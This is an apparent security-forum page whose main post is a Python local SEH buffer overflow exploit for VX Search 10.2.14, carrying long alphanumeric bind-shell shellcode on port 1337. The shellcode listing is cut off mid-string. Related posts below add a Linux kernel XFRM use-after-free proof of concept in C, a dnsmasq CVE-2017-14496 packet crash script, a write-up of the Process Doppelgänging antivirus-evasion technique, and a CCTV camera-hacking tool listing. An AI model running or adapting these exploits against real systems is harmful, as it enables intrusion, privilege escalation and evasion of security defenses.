Jump to content
Fi8sVrs

VX Search 10.2.14 - Proxy Buffer Overflow (SEH) Exploit

Recommended Posts

#!/usr/bin/env python
#
# Exploit Title     : VXSearch v10.2.14 Local SEH Overflow
# Date              : 11/16/2017
# Exploit Author    : wetw0rk
# Vendor Homepage   : http://www.flexense.com/
# Software link     : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Version           : 10.2.14
# Tested on         : Windows 7 (x86)
# Description       : VX Search v10.2.14 suffers from a local buffer overflow. The
#                     following exploit will generate a bind shell on port 1337. I
#                     was unable to get a shell working with msfvenom shellcode so
#                     below is a custom alphanumeric bind shell. Greetz rezkon ;)
#
# trigger the vulnerability by :
#   Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name
#
 
import struct
 
shellcode = "w00tw00t"
shellcode += (
"\x25\x4a\x4d\x4e\x55"  # and eax, 0x554e4d4a
"\x25\x35\x32\x31\x2a"  # and eax, 0x2a313235
"\x2d\x6a\x35\x35\x35"  # sub eax, 0x3535356a
"\x2d\x65\x6a\x6a\x65"  # sub eax, 0x656a6a65
"\x2d\x61\x64\x4d\x65"  # sub eax, 0x654d6461
"\x50"                  # push eax
"\x5c"                  # pop esp
)
shellcode += (
"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4f\x4f\x4f\x4f"
"\x2d\x4f\x30\x4f\x68\x2d\x62\x2d\x62\x72\x50\x25\x4a\x4d\x4e"
"\x55\x25\x35\x32\x31\x2a\x2d\x76\x57\x57\x63\x2d\x77\x36\x39"
"\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x54"
"\x54\x54\x2d\x25\x54\x7a\x2d\x2d\x25\x52\x76\x36\x50\x25\x4a"
"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x35\x49\x49\x2d\x49"
"\x25\x49\x69\x2d\x64\x25\x72\x6c\x50\x25\x4a\x4d\x4e\x55\x25"
"\x35\x32\x31\x2a\x2d\x70\x33\x33\x25\x2d\x70\x25\x70\x25\x2d"
"\x4b\x6a\x56\x39\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
"\x2d\x79\x55\x75\x32\x2d\x79\x75\x75\x55\x2d\x79\x77\x77\x78"
"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x4a\x4a"
"\x25\x2d\x39\x5f\x4d\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
"\x31\x2a\x2d\x4b\x57\x4b\x57\x2d\x70\x76\x4b\x79\x2d\x70\x76"
"\x78\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49"
"\x49\x49\x49\x2d\x49\x4e\x64\x49\x2d\x78\x25\x78\x25\x2d\x6f"
"\x25\x7a\x48\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
"\x58\x58\x38\x58\x2d\x58\x30\x32\x58\x2d\x51\x46\x2d\x47\x50"
"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x5f\x52\x5f\x5f"
"\x2d\x5f\x25\x25\x35\x2d\x62\x39\x25\x25\x50\x25\x4a\x4d\x4e"
"\x55\x25\x35\x32\x31\x2a\x2d\x4a\x4a\x4a\x4a\x2d\x4a\x4a\x4a"
"\x4a\x2d\x79\x39\x4a\x79\x2d\x6d\x32\x4b\x68\x50\x25\x4a\x4d"
"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x30\x71\x30\x2d\x30\x25"
"\x71\x30\x2d\x38\x31\x51\x5f\x50\x25\x4a\x4d\x4e\x55\x25\x35"
"\x32\x31\x2a\x2d\x32\x32\x32\x32\x2d\x78\x77\x7a\x77\x50\x25"
"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x62\x62\x62\x62\x2d"
"\x48\x57\x47\x4f\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
"\x2d\x76\x76\x4f\x4f\x2d\x36\x39\x5a\x5a\x50\x25\x4a\x4d\x4e"
"\x55\x25\x35\x32\x31\x2a\x2d\x61\x61\x61\x61\x2d\x4a\x61\x4a"
"\x25\x2d\x45\x77\x53\x35\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
"\x31\x2a\x2d\x63\x63\x63\x63\x2d\x39\x63\x63\x2d\x2d\x32\x63"
"\x7a\x25\x2d\x31\x49\x7a\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35"
"\x32\x31\x2a\x2d\x72\x79\x79\x79\x2d\x25\x30\x25\x30\x2d\x25"
"\x32\x25\x55\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
"\x58\x58\x41\x58\x2d\x58\x58\x25\x77\x2d\x6e\x51\x32\x69\x50"
"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x48\x77\x38\x48"
"\x2d\x4e\x76\x6e\x61\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
"\x2a\x2d\x41\x41\x6e\x6e\x2d\x31\x31\x30\x6e\x2d\x37\x36\x30"
"\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x38\x38"
"\x38\x38\x2d\x38\x79\x38\x25\x2d\x38\x79\x38\x25\x2d\x58\x4c"
"\x73\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x61"
"\x52\x61\x52\x2d\x37\x4a\x31\x49\x50\x25\x4a\x4d\x4e\x55\x25"
"\x35\x32\x31\x2a\x2d\x4d\x47\x4d\x4d\x2d\x30\x25\x4d\x6b\x2d"
"\x36\x32\x66\x71\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
"\x2d\x36\x43\x43\x6c\x2d\x33\x54\x47\x25\x50\x25\x4a\x4d\x4e"
"\x55\x25\x35\x32\x31\x2a\x2d\x4c\x4c\x4c\x4c\x2d\x6e\x4c\x6e"
"\x36\x2d\x65\x67\x6f\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
"\x31\x2a\x2d\x25\x25\x4b\x4b\x2d\x25\x25\x6f\x4b\x2d\x4e\x41"
"\x59\x2d\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41"
"\x41\x41\x41\x2d\x52\x52\x78\x41\x2d\x6e\x6c\x70\x25\x50\x25"
"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x30\x6c\x30\x30\x2d"
"\x30\x6c\x6c\x30\x2d\x38\x70\x79\x66\x50\x25\x4a\x4d\x4e\x55"
"\x25\x35\x32\x31\x2a\x2d\x42\x70\x70\x45\x2d\x32\x45\x70\x31"
"\x2d\x25\x4b\x49\x31\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
"\x2a\x2d\x25\x50\x50\x50\x2d\x25\x7a\x72\x25\x2d\x4e\x73\x61"
"\x52\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x77"
"\x74\x74\x2d\x61\x78\x35\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35"
"\x32\x31\x2a\x2d\x30\x30\x30\x30\x2d\x30\x30\x59\x30\x2d\x30"
"\x30\x74\x51\x2d\x6b\x36\x79\x67\x50\x25\x4a\x4d\x4e\x55\x25"
"\x35\x32\x31\x2a\x2d\x75\x38\x43\x43\x2d\x7a\x31\x43\x43\x2d"
"\x7a\x2d\x77\x79\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
"\x2d\x59\x59\x59\x59\x2d\x59\x59\x59\x59\x2d\x6f\x6c\x4d\x77"
"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45"
"\x45\x2d\x34\x2d\x76\x45\x2d\x37\x25\x5a\x65\x50\x25\x4a\x4d"
"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x34\x34\x34\x34\x2d\x62\x34"
"\x34\x34\x2d\x6d\x56\x47\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35"
"\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x76\x2d\x2d\x76\x2d\x55"
"\x4c\x55\x7a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
"\x77\x77\x77\x30\x2d\x47\x47\x79\x30\x2d\x42\x42\x39\x34\x50"
"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x75\x36\x51"
"\x2d\x42\x61\x49\x43\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
"\x2a\x2d\x56\x56\x31\x56\x2d\x31\x79\x31\x25\x2d\x50\x6c\x48"
"\x34\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x72\x72"
"\x72\x72\x2d\x72\x25\x38\x38\x2d\x38\x25\x25\x25\x2d\x54\x41"
"\x30\x30\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47"
"\x47\x47\x76\x2d\x47\x47\x76\x76\x2d\x6b\x72\x6c\x5a\x50\x25"
"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x25\x71\x25\x71\x2d"
"\x73\x42\x63\x68\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
"\x2d\x48\x55\x51\x51\x2d\x45\x78\x4f\x5a\x50\x25\x4a\x4d\x4e"
"\x55\x25\x35\x32\x31\x2a\x2d\x45\x45\x45\x32\x2d\x45\x45\x25"
"\x31\x2d\x76\x75\x2d\x25\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
"\x31\x2a\x2d\x6e\x4f\x6d\x6e\x2d\x35\x48\x5f\x5f\x50\x25\x4a"
"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x2d\x2d\x2d\x2d\x2d\x71"
"\x2d\x2d\x71\x2d\x71\x2d\x4a\x71\x2d\x66\x65\x70\x62\x50\x25"
"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x56\x30\x56\x30\x2d"
"\x56\x38\x25\x30\x2d\x74\x37\x25\x45\x50\x25\x4a\x4d\x4e\x55"
"\x25\x35\x32\x31\x2a\x2d\x32\x32\x32\x77\x2d\x32\x32\x32\x32"
"\x2d\x43\x41\x4a\x57\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31"
"\x2a\x2d\x63\x63\x63\x30\x2d\x79\x41\x41\x6e\x50\x25\x4a\x4d"
"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x4b\x4b\x4b\x4b\x2d\x4b\x4b"
"\x25\x31\x2d\x4b\x71\x25\x32\x2d\x4f\x6e\x25\x2d\x50\x25\x4a"
"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x37\x37\x37\x37\x2d\x6d"
"\x37\x6d\x37\x2d\x6d\x37\x6d\x37\x2d\x64\x55\x63\x58\x50\x25"
"\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x44\x6c\x6c\x6c\x2d"
"\x34\x44\x44\x6c\x2d\x30\x33\x4e\x54\x50\x25\x4a\x4d\x4e\x55"
"\x25\x35\x32\x31\x2a\x2d\x2d\x7a\x43\x2d\x2d\x48\x79\x71\x47"
"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x41\x41\x41"
"\x41\x2d\x41\x46\x71\x25\x2d\x5a\x77\x7a\x32\x50\x25\x4a\x4d"
"\x4e\x55\x25\x35\x32\x31\x2a\x2d\x47\x47\x47\x47\x2d\x47\x6e"
"\x47\x6e\x2d\x47\x78\x6e\x78\x2d\x47\x79\x77\x79\x50\x25\x4a"
"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x38\x69\x38\x2d\x51"

#  0day.today [2017-11-17]  #

Source: Please login or register to see this link.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Similar Content

    • By Fi8sVrs

       
      A team of security researchers has discovered a new malware evasion technique that could help malware authors defeat most of the modern antivirus solutions and forensic tools.

      Dubbed Process Doppelgänging, the new fileless code injection technique takes advantage of a built-in Windows function and an undocumented implementation of Windows process loader.

      Ensilo security researchers Please login or register to see this link. and Eugene Kogan, who discovered the Process Doppelgänging attack, Please login or register to see this link. their findings today at Black Hat 2017 Security conference held in London.
       
      Process Doppelgänging Works on All Windows Versions
       
      Apparently, Process Doppelgänging attack works on all modern versions of Microsoft Windows operating system, starting from Windows Vista to the latest version of Windows 10.
       
      Tal Liberman, the head of the research team at enSilo, told The Hacker New that this malware evasion technique is similar to Process Hollowing—a method first introduced years ago by attackers to defeat the mitigation capabilities of security products.

      In Process Hollowing attack, hackers replace the memory of a legitimate process with a malicious code so that the second code runs instead of the original, tricking process monitoring tools and antivirus into believing that the original process is running.

      Since all modern antivirus and security products have been upgraded to detect Process Hollowing attacks, use of this technique is not a great idea anymore.

      On the other hand, Process Doppelgänging is an entirely different approach to achieve the same, by abusing Windows NTFS Transactions and an outdated implementation of Windows process loader, which was originally designed for Windows XP, but carried throughout all later versions of Windows.
       
      Here's How the Process Doppelgänging Attack Works:
       
      Before going further on how this new code injection attack works, you need to understand what Windows NTFS Transaction is and how an attacker could leverage it to evade his malicious actions.

      Please login or register to see this link. is a feature of Windows that brings the concept of atomic transactions to the NTFS file system, allowing files and directories to be created, modified, renamed, and deleted atomically.
       
      NTFS Transaction is an isolated space that allows Windows application developers to write file-output routines that are guaranteed to either succeed completely or fail completely.

      According to the researcher, Process Doppelgänging is a fileless attack and works in four major steps as mentioned below:
      Transact—process a legitimate executable into the NTFS transaction and then overwrite it with a malicious file. Load—create a memory section from the modified (malicious) file. Rollback—rollback the transaction (deliberately failing the transaction), resulting in the removal of all the changes in the legitimate executable in a way they never existed. Animate—bring the doppelganger to life. Use the older implementation of Windows process loader to create a process with the previously created memory section (in step 2), which is actually malicious and never saved to disk, "making it invisible to most recording tools such as modern EDRs."  
      Process Doppelgänging Evades Detection from Most Antiviruses

      Liberman told The Hacker News that during their research they tested their attack on security products from Windows Defender, Kaspersky Labs, ESET NOD32, Symantec, Trend Micro, Avast, McAfee, AVG, Panda, and even advance forensic tools.

      In order to demonstrate, the researchers used Mimikatz, a post-exploitation tool that helps extract credentials from the affected systems, with Process Doppelgänging to bypass antivirus detection.

      When the researchers ran Mimikatz generally on a Windows operating system, Symantec antivirus solution caught the tool immediately, as shown below:
       

      However, Mimikatz ran stealthy, without antivirus displaying any warning when executed using Process Doppelgänging, as shown in the image at top of this article.

      Liberman also told us that Process Doppelgänging works on even the latest version of Windows 10, except Windows 10 Redstone and Fall Creators Update, released earlier this year.

      But due to a different bug in Windows 10 Redstone and Fall Creators Update, using Process Doppelgänging causes BSOD (blue screen of death), which crashes users' computers.

      Ironically, the crash bug was patched by Microsoft in later updates, allowing Process Doppelgänging to run on the latest versions of Windows 10.

      I don't expect Microsoft to rush for an emergency patch that could make some software relying on older implementations unstable, but Antivirus companies can upgrade their products to detect malicious programs using Process Doppelgänging or similar attacks.

      This is not the very first time when enSilo researchers have discovered a malware evasion technique. Previously they discovered and demonstrated Please login or register to see this link. which also abused a designing weakness in Windows OS.

      In September, enSilo researchers also disclosed a 17-year-old programming error in Please login or register to see this link. that prevented security software from detecting malware at runtime when loaded into system memory.
       
      Via Please login or register to see this link.
    • By Fi8sVrs
      Vulnerability Summary
      The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM.
      Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.
       
      Credit
      An independent security researcher, Mohamed Ghannam, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
       
      Vendor reposnse
      The vulnerability has been addressed as part of 1137b5e (“ipsec: Fix aborted xfrm policy dump crash”) patch: CVE-2017-16939
      @@ -1693,32 +1693,34 @@ static int dump_one_policy(struct xfrm_policy *xp, int dir, int count, void *ptr static int xfrm_dump_policy_done(struct netlink_callback *cb) { - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct net *net = sock_net(cb->skb->sk); xfrm_policy_walk_done(walk, net); return 0; } +static int xfrm_dump_policy_start(struct netlink_callback *cb) +{ + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; + + BUILD_BUG_ON(sizeof(*walk) > sizeof(cb->args)); + + xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); + return 0; +} + static int xfrm_dump_policy(struct sk_buff *skb, struct netlink_callback *cb) { struct net *net = sock_net(skb->sk); - struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *) &cb->args[1]; + struct xfrm_policy_walk *walk = (struct xfrm_policy_walk *)cb->args; struct xfrm_dump_info info; - BUILD_BUG_ON(sizeof(struct xfrm_policy_walk) > - sizeof(cb->args) - sizeof(cb->args[0])); - info.in_skb = cb->skb; info.out_skb = skb; info.nlmsg_seq = cb->nlh->nlmsg_seq; info.nlmsg_flags = NLM_F_MULTI; - if (!cb->args[0]) { - cb->args[0] = 1; - xfrm_policy_walk_init(walk, XFRM_POLICY_TYPE_ANY); - } - (void) xfrm_policy_walk(net, walk, dump_one_policy, &info); return skb->len; @@ -2474,6 +2476,7 @@ static const struct nla_policy xfrma_spd_policy[XFRMA_SPD_MAX+1] = { static const struct xfrm_link { int (*doit)(struct sk_buff *, struct nlmsghdr *, struct nlattr **); + int (*start)(struct netlink_callback *); int (*dump)(struct sk_buff *, struct netlink_callback *); int (*done)(struct netlink_callback *); const struct nla_policy *nla_pol; @@ -2487,6 +2490,7 @@ static const struct xfrm_link { [XFRM_MSG_NEWPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_add_policy }, [XFRM_MSG_DELPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy }, [XFRM_MSG_GETPOLICY - XFRM_MSG_BASE] = { .doit = xfrm_get_policy, + .start = xfrm_dump_policy_start, .dump = xfrm_dump_policy, .done = xfrm_dump_policy_done }, [XFRM_MSG_ALLOCSPI - XFRM_MSG_BASE] = { .doit = xfrm_alloc_userspi }, @@ -2539,6 +2543,7 @@ static int xfrm_user_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh, { struct netlink_dump_control c = { + .start = link->start, .dump = link->dump, .done = link->done, };  
      Vulnerability details
      An unprivileged user can change Netlink socket subsystem – XFRM value sk->sk_rcvbuf (sk == struct sock object).
       
      The value can be changed into specific range via setsockopt(SO_RCVBUF). sk_rcvbuf is the total number of bytes of a buffer receiving data via recvmsg/recv/read.
       
      The sk_rcvbuf value is how many bytes the kernel should allocate for the skb (struct sk_buff objects).
       
      skb->trusize is a variable which keep track of how many bytes of memory are consumed, in order to not wasting and manage memory, the kernel can handle the skb size at run time.
       
      For example, if we allocate a large socket buffer (skb) and we only received 1-byte packet size, the kernel will adjust this by calling skb_set_owner_r.
       
      By calling skb_set_owner_r the sk->sk_rmem_alloc (refers to an atomic variable sk->sk_backlog.rmem_alloc) is modified.
       

       
      When we create a XFRM netlink socket, xfrm_dump_policy is called, when we close the socket xfrm_dump_policy_done is called.
       
      xfrm_dump_policy_done is called whenever cb_running for netlink_sock object is true.
       
      The xfrm_dump_policy_done tries to clean-up a xfrm walk entry which is managed by netlink_callback object.
       

       
      When netlink_skb_set_owner_r is called (like skb_set_owner_r) it updates the sk_rmem_alloc.
       
      netlink_dump():

       
      In above snippet we can see that netlink_dump() check fails when sk->sk_rcvbuf is smaller than sk_rmem_alloc (notice that we can control sk->sk_rcvbuf via stockpot).
       
      When this condition fails, it jumps to the end of a function and quit with failure and the value of cb_running doesn’t changed to false.
       
      nlk->cb_running is true, thus xfrm_dump_policy_done() is being called.
       

       
       
      nlk->cb.done points to xfrm_dump_policy_done, it worth noting that this function handles a doubly linked list, so if we can tweak this vulnerability to reference a controlled buffer, we could have a read/write what/where primitive.
       
      Proof of concept
      The following proof of concept is for Ubuntu 17.04.
      #define _GNU_SOURCE #include <string.h> #include <stdio.h> #include <stdlib.h> #include <asm/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/netlink.h> #include <linux/xfrm.h> #include <sched.h> #include <unistd.h> #define BUFSIZE 2048 int fd; struct sockaddr_nl addr; struct msg_policy { struct nlmsghdr msg; char buf[BUFSIZE]; }; void create_nl_socket(void) { fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM); memset(&addr,0,sizeof(struct sockaddr_nl)); addr.nl_family = AF_NETLINK; addr.nl_pid = 0; /* packet goes into the kernel */ addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */ } void do_setsockopt(void) { int var =0x100; setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int)); } struct msg_policy *init_policy_dump(int size) { struct msg_policy *r; r = malloc(sizeof(struct msg_policy)); if(r == NULL) { perror("malloc"); exit(-1); } memset(r,0,sizeof(struct msg_policy)); r->msg.nlmsg_len = 0x10; r->msg.nlmsg_type = XFRM_MSG_GETPOLICY; r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST; r->msg.nlmsg_seq = 0x1; r->msg.nlmsg_pid = 2; return r; } int send_msg(int fd,struct nlmsghdr *msg) { int err; err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl)); if (err < 0) { perror("sendto"); return -1; } return 0; } void create_ns(void) { if(unshare(CLONE_NEWUSER) != 0) { perror("unshare(CLONE_NEWUSER)"); exit(1); } if(unshare(CLONE_NEWNET) != 0) { perror("unshared(CLONE_NEWUSER)"); exit(2); } } int main(int argc,char **argv) { struct msg_policy *p; create_ns(); create_nl_socket(); p = init_policy_dump(100); do_setsockopt(); send_msg(fd,&p->msg); p = init_policy_dump(1000); send_msg(fd,&p->msg); return 0; }  
      Source: Please login or register to see this link.
    • By u0m3
      Synopsis: Cameradar hacks its way into RTSP CCTV cameras. An RTSP stream access tool that comes with its library.
      Link: Please login or register to see this link.
    • By Fi8sVrs
      Author: Please login or register to see this link.   |  Category:  Please login or register to see this link.   |  Platform: Please login or register to see this link.
      Date add: Please login or register to see this link.   |   Risk: [Security Risk Medium]  |  0day-ID: Please login or register to see this link. | CVE: Please login or register to see this link.
       
      ''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet. ================================================================= ==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4) #0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be) #1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8 #2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12 #3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20 #4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16 #5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2 #6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7 #7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) #8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9) 0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b) allocated by thread T0 here: #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700) #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15 #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20 #3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0) SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy ==2215==ABORTING ''' #!/usr/bin/python # # Copyright 2017 Google Inc # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Authors: # Fermin J. Serna <fjserna@google.com> # Felix Wilhelm <fwilhelm@google.com> # Gabriel Campana <gbrl@google.com> # Kevin Hamacher <hamacher@google.com> # Gynvael Coldwin <gynvael@google.com> # Ron Bowes - Xoogler :/ import socket import sys def negative_size_param(): data = '''00 00 00 00 00 00 00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79 00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08 08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00 00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00 01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00 00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01 13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00 00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00 35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05 01 20 00 01 '''.replace(' ', '').replace('\n', '').decode('hex') return data if __name__ == '__main__': if len(sys.argv) != 3: print 'Usage: %s <ip> <port>' % sys.argv[0] sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) packet = negative_size_param() s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1) s.sendto(packet, (ip, port)) s.close() # 0day.today [2017-10-03] # Source: Please login or register to see this link.
×